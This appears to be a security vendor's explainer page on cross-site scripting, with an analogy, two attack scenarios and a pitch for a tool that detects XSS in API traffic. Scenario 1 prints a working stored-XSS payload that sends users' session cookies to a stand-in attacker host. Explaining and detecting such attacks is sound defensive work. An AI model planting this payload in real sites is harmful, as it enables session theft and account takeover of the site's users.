XSS lets an attacker inject JavaScript into your web application that then runs in the browsers of other users. This can steal session cookies, capture keystrokes, redirect victims to phishing pages, or perform actions on their behalf — all silently, while the user thinks they are on your legitimate site.
Think of it this way
Imagine a notice board where anyone can post a message. An attacker pins a note that, when read by anyone walking past, hypnotises them and sends their wallet to the attacker. XSS is like that — your page is the notice board, the attacker's script is the hypnotic note, and your users are the victims.
An attacker finds a place in your app where user-submitted content is displayed without sanitisation — a comment field, a product review, a username. They submit content containing a `<script>` tag or an event handler like `<img onerror=...>`. When other users load the page, the browser executes the malicious script as if it came from your trusted domain, giving the attacker access to the user's session.
Scenario 1
An attacker posts a comment containing `<script>document.location='https://evil.com/steal?c='+document.cookie</script>` on a forum. Every user who views that comment has their session cookie sent to the attacker, who then uses it to log in as them.
Scenario 2
A stored XSS payload on a banking portal's transaction notes field captures every keystroke made by bank administrators, including passwords and private customer data viewed during support sessions.
Anomira looks for common XSS payloads in API request bodies and parameters — script tags, JavaScript event handlers, encoded variants — and flags them before they reach your database or response pipeline.
See this attack in your live API traffic
Anomira detects cross-site scripting (xss) automatically — no configuration needed.